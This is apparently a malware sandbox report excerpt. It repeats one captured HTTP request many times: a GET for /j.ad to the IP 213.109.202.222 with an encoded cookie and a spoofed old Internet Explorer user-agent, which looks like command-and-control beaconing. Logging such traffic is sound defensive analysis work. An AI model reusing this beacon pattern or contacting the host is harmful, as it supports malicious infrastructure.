      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j.ad HTTP/1.1Accept: */*Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
